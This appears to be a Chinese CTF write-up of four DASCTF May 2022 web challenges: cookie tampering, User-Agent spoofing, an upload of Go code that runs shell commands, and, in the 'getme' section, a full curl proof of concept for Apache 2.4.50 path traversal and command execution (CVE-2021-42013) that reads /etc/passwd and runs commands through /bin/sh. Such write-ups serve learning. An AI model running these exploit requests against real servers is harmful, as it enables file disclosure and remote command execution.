2022DASCTF MAY

大佬们都在努力,我个小白也不能落下加油!!!


Power Cookie

打开界面,额用游客的方式登录,点一下 

啥都没有,一般这样的题都是抓包改一下,cookie的值或者x-forwarded-for等

提示admin那就是cookie 

试了一下,发现cookie admin=1就可以了 

魔法浏览器

没啥思路,还是看一下源码扒

 hex编码,解码一下,

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Magic/100.0.4896.75

 log

 然后改一下文件User-Agent

 就可以获得flag

getme

打开页面<!-- pwd:/usr/local/apache2/ -->,就这一个目录信息

一个字,蒙!

然后burp扫一下,发现

 搜索一下Apache/2.4.50 (Unix),

Apache HTTP Server 2.4.50 中的路径遍历和文件泄露漏洞 (CVE-2021-42013)

漏洞利用poc:

curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

可以查看任意文件 

说明存在漏洞

目标服务器开启cgi或者cgid时候,可以命令执行

    curl -v --data "echo;命令" '目标地址:端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

 或者

GET :

/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

POST:

echo Content-Type: text/plain; echo;ls /

不知道什么原因, 不返回值,可是看其他wp就是这样,然后就出来目录,接着探索,可能是我burp出错了,调试一下。

 

hackme

打开界面发现最下面可以点击,那点击进去

 

 发现可能每一个链接中有一个文件,而每一个对应的文件中执行了一条命令。像上面的whoami、pwd等等。

看到这然后,go语言目前还没学到,先简单了解一下,Go语言中用 os/exec 执行命令的五种姿势 - 知乎需要上传个uers文件,然后他就会进行go的解析

package main
 
import (
    "fmt"
    "os/exec"
)
 
func main() {
    Command("ls /")            执行的命令
}
 
func Command(cmd string) error {
    c := exec.Command("bash", "-c", cmd)
    output, err := c.CombinedOutput()
    fmt.Println(string(output))
    return err
}

 

最后发现flag,用cat /flag 代替上面语句中的ls /即可查找到flag。所以这个题看似其实不完全考到go即使不是很懂go语言,考的是go脚本。

后面俩道题,实现是能力,不够,继续学习

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值